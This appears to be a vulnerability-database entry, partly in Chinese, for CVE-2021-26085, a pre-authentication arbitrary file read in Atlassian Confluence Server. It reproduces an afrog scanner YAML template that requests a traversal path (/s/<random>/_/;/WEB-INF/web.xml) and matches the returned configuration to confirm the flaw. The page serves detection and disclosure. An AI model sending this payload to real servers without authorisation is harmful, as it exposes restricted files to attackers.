CVE-2021-26085: Confluence Pre-Authorization Arbitrary File Read

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.

PoC代码[已公开]

id: CVE-2021-26085

info:
  name: Confluence Pre-Authorization Arbitrary File Read
  author: wulalalaaa
  severity: medium
  description: |-
    Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. The affected versions are before version 7.4.10, and from version 7.5.0 before 7.12.3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26085
  tags: cve,cve2021,confluence,arbitrary-file-read
  created: 2021/04/20

set:
  rand: randomLowercase(6)
rules:
  r0:
    request:
      method: GET
      path: /s/{{rand}}/_/;/WEB-INF/web.xml
    expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2021/CVE-2021-26085.yaml